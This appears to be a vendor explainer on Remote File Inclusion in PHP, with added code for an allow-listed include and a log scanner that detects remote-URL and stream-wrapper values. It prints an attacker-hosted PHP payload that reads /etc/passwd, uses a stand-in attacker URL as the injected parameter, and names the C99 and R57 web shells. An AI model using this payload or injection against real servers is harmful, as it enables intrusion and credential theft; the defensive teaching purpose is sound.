Remote File Inclusion is an attack technique that exploits the ability of certain web-based programming frameworks to dynamically execute remote scripts. The vulnerability manifests when the name or location of the remote script is constructed using input parameters in an HTTP request and the web application fails to validate these inputs.
Using the parameter's value, the web server fetches a remote file specified by a URI (for example, http://www.attacker-site.com/malicious.php) and includes the code from this remote file into the currently executing context on the victim web server. The malicious script could steal sensitive data, take over the web server, or install backdoors.
Remote File Inclusion attacks are mostly performed against web applications built on a server-side scripting language such as PHP. PHP code uses "file include" extensively and is therefore more exposed to RFI attacks. RFI attacks also occur in other environments such as JSP, ASP, etc.
If an attacker succeeds in exploiting a Remote File Inclusion vulnerability in a web server or web application, they can include a remotely hosted malicious file and execute code under their control. By executing that code, the attacker can steal session cookies or sensitive data stored on the server, manipulate content, or take complete control of the server.
Ready-to-use "web shells" like C99 and R57 are freely available on the web. These are very powerful web-based shells that provide a sophisticated UI to completely control the system, including full access to OS commands and file systems, options to install backdoors or Trojans, etc.
The Remote File Inclusion attack occurs when the user-supplied input is not properly filtered or sanitized. The following data must be sanitized properly before being processed:
- URL Parameters
- FORM Parameters (GET and POST parameters)
- HTTP Request Headers
A web user accesses www.exampleRFI.com and lands on the main page. The request goes to the server as: http://www.exampleRFI.com/content.php?page=menu.php
If content.php processes the value of the "page" parameter as:
According to the above PHP code, menu.php is executed on the server and its output is displayed by content.php in the browser.
If the attacker were able to glean how content.php works, they could try to include a malicious script to be executed instead of menu.php to steal server information.
As an example, the following is a script that the attacker could host to read the password file on UNIX-based systems (malicious.php, hosted on www.attacker-site.com):
<?php
$filename = "/etc/passwd";          // file on the victim server to read
$fh = fopen($filename, 'r');
$read_content = fread($fh, 1000);   // read the first 1000 bytes
fclose($fh);
echo $read_content;                 // contents end up in the HTTP response
This script is intended to read the content of the password file (/etc/passwd) and return it in the response.
The attacker would then tamper with the page parameter to point to their remotely hosted malicious script:
This could display the user account information that is stored in the /etc/passwd file of the server.
Properly validating and filtering user input can prevent Remote File Inclusion attacks. Vulnerability scanning and code audits can help identify such vulnerabilities, but legacy and third-party code can be a challenge. Scanning also does not remediate, so the fixes have to be implemented manually. This can be difficult when the interfaces are tightly wound into the code.
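To show what "properly validating" the page parameter looks like in practice, here is an added example (not code from the original article) that places the vulnerable include pattern described above beside a hardened version. The file names, the pages/ directory and the allow-list contents are assumptions for illustration.

```php
<?php
// Added example: vulnerable include versus an allow-list based include.
// File names and the ALLOWED_PAGES table are illustrative assumptions.

// --- Vulnerable pattern: the request parameter is used directly as the include path.
// If allow_url_include is enabled, ?page=http://attacker-site.example/malicious.php
// fetches and executes remote code inside this script's context.
function includeVulnerable(array $get): void
{
    include $get['page'];
}

// --- Hardened pattern: the parameter is only ever a key into a fixed allow-list
// of local files; anything not in the list falls back to a safe default.
const ALLOWED_PAGES = [
    'menu'    => 'menu.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolvePage(?string $requested): string
{
    // Only short lowercase keys are accepted, so URLs, slashes, dots and
    // stream wrappers such as php:// or data:// can never match.
    if ($requested === null || !preg_match('/^[a-z]{1,20}$/', $requested)) {
        return ALLOWED_PAGES['menu'];
    }
    return ALLOWED_PAGES[$requested] ?? ALLOWED_PAGES['menu'];
}

function includeHardened(array $get): void
{
    // The include path is built from a server-side directory plus an
    // allow-listed file name; the raw request value never reaches include.
    $file = __DIR__ . '/pages/' . resolvePage($get['page'] ?? null);
    include $file;
}

// Demonstration of the resolver on the attack value from the article and a
// few other constructed inputs (no real traffic).
foreach (['menu', 'about', 'http://www.attacker-site.com/malicious.php',
          '../../etc/passwd', 'php://input', null] as $value) {
    printf("%-45s -> %s\n", var_export($value, true), resolvePage($value));
}
```

Every input except a known key resolves to menu.php, so the remote URL, the directory-traversal string and the php:// wrapper are all neutralised before include runs. As defence in depth, leave allow_url_include=Off in php.ini (its default), which stops include from fetching remote URLs even if a vulnerable pattern survives somewhere in legacy code.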
The Barracuda Web Application Firewall's default security policy includes rule sets that identify and block RFI attacks out of the box. It logs every instance of such an attack in the Web Firewall Logs along with the exact details of the targeted parameter and the malicious values used for the exploit. Alerts and notifications can be set up for such attacks as well.
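As an added illustration of the kind of check that reports "the targeted parameter and the malicious values" for an RFI attempt, the following script (not Barracuda's code) scans access-log request lines and flags any query parameter whose value is a remote URL or a PHP stream wrapper. The log lines, IP addresses and hostnames are constructed samples.

```php
<?php
// Added example: flag request parameters that carry remote URLs or stream
// wrappers, the values an RFI attempt sends. Sample log lines are constructed.

const RFI_VALUE_PATTERN = '~^(?:https?|ftps?)://|^(?:php|data|expect|phar)://|^//~i';

/**
 * Scan one access-log line in common log format and return a list of
 * ['param' => ..., 'value' => ...] entries for every suspicious parameter.
 */
function findRfiParameters(string $logLine): array
{
    $findings = [];
    // Pull the request target, e.g. "/content.php?page=...", out of the line.
    if (!preg_match('~"(?:GET|POST)\s+(\S+)~', $logLine, $m)) {
        return $findings;
    }
    $query = parse_url($m[1], PHP_URL_QUERY);
    if ($query === null || $query === false) {
        return $findings;
    }
    // parse_str also URL-decodes, so %3A%2F%2F becomes :// before matching.
    parse_str($query, $params);
    foreach ($params as $name => $value) {
        if (is_string($value) && preg_match(RFI_VALUE_PATTERN, $value)) {
            $findings[] = ['param' => $name, 'value' => $value];
        }
    }
    return $findings;
}

// Constructed sample lines: one benign request, two RFI-style requests and
// one benign request whose value merely contains the word "https".
$sampleLog = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /content.php?page=menu.php HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /content.php?page=http://www.attacker-site.com/malicious.php HTTP/1.1" 200 1024',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /content.php?page=php%3A%2F%2Finput HTTP/1.1" 200 77',
    '10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /search.php?q=https HTTP/1.1" 200 300',
];

foreach ($sampleLog as $line) {
    foreach (findRfiParameters($line) as $f) {
        echo "RFI indicator: param={$f['param']} value={$f['value']}\n";
    }
}
```

Only the second and third lines produce findings (param=page with the remote URL, and param=page with php://input), which is the level of detail an analyst needs to trace the attempt back to the vulnerable parameter. The pattern deliberately anchors on the start of the value, so ordinary text that happens to mention "http" is not reported.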
OWASP Top 10, PCI-DSS